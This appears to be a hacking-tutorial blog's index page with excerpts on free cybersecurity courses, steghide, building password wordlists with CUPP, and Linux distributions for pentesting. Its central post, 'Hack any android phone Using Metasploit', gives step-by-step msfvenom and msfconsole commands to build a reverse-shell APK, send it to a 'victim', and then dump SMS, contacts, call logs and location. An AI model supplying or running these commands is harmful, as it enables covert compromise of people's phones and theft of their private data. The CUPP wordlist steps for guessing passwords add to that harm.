

        As covid-19 spreading rapidly, many institutes and online platforms provides cybersecurity certification courses for free of cost. International CyberSecurity Institute (ICSE)  Certified Network Security Specialist           This course provides a holistic view of modern network security including operating system hardening, firewalls, intrusion-detection systems, VPNs and encryption. Physical security, system security policies are also included. Fortinet CyberSecurity Training Free Advanced Training for Security Professional           These courses cover everything from basic cybersecurity awareness training to advanced training on security driven networking, dynamic cloud security, AI driven security operations and zero trust network access. University of Washington  Introduction to CyberSecurity           An introduction to cybersecurit...


                           Steganography is the technique used to hide a data within a data. we can send a confidential data within a image or audio file.  Steghide                            Steghide is a steganography program that allows to hide a data in various kind of images and audio files.     installation    open terminal      sudo apt-get install steghide     E mbeding data into a file              steghide embed -cf   file name  -ef  secret file name              Enter passphrase (optional)              secret data is successfully embeded into cover file     Extract secret data from a cover file (stego file)   ...

How to Create a Custom Word list using Cupp

Installation of Cupp open Terminal install the cupp using following command           git clone             3. open cupp directory       4. cd cupp       5. ls       6. chmod +x *     ( to grant permission )       7. run cupp using the following command            python3       8. use -i argument to create world list on interactive questions      9. python3 -i      REQUIREMENTS     git       python3

Hack any android phone Using Metasploit

METASPLOIT CREATE A PAYLOAD 1. Open a terminal 2. Type the following:     msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=port no R>apk_name.apk 3. Run this command and wait few seconds 4. Payload created successfully 5. Send the apk file to victim  5. Now, open an another terminal 6. Then type the following:     msfconsole   (metasploit framework is opened)     use exploit/multi/handler     set payload android/meterpreter/reverse_tcp     set  LHOST  your ip     set  LPORT  your port np     exploit 7. Started reverse tcp handler...    Now use the following commands dumb_sms dumb_contacts dumb_calllog geolocate send_sms send_audio_mode hide_app_icon    ...etc   

Top 3 Operating systems for Hacking

1. Kali Linux            kali linux is the most popular and commonly used ethical hacking operating system. kali linux comes with a large amount of pen testing tools. The popular kali linux tools are: Metasploit nmap wireshark aircrack-ng 2.Parrot Security OS          Parrot OS is based on Debian. It comes with large amount of pen testing tools. It uses MATE as its desktop environment. 3.BackBox                     Backbox is a pen test and security assessment oriented Ubuntu based linux distribution providing a network and informatic systems analysis toolkit.